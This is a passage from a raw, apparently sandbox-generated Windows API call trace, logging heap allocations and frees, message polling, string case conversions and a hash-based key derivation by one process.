Flags=0x0, Size=0x10) returned 0x24aa950 [0256.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.728] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.728] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.728] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.729] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.729] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0256.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.729] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0256.729] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.729] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0256.729] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.729] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.730] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.730] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.730] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0256.730] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0256.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.730] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.730] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.731] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.731] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.731] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.731] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.731] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0256.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0256.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.732] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0256.732] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.732] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0256.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0256.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.732] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.733] CryptCreateHash (in: hProv=0xad2698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0256.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0256.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0256.733] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0256.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.734] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.734] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.734] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.735] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0256.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0256.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0256.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0256.735] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0256.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0256.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0256.735] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0256.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0256.736] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.736] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.736] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.736] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.736] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.737] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0256.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.737] CryptHashData (hHash=0xaa5820, pbData=0x24b1698, dwDataLen=0x3, dwFlags=0x1) returned 1 [0256.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0256.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.737] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0256.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0256.738] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.738] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.738] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.738] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.738] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.738] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.738] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.738] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.738] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.738] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0256.738] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.739] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.739] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.739] CryptDeriveKey (in: hProv=0xad2698, Algid=0x6601, hBaseData=0xaa5820, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5960) returned 1 [0256.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: 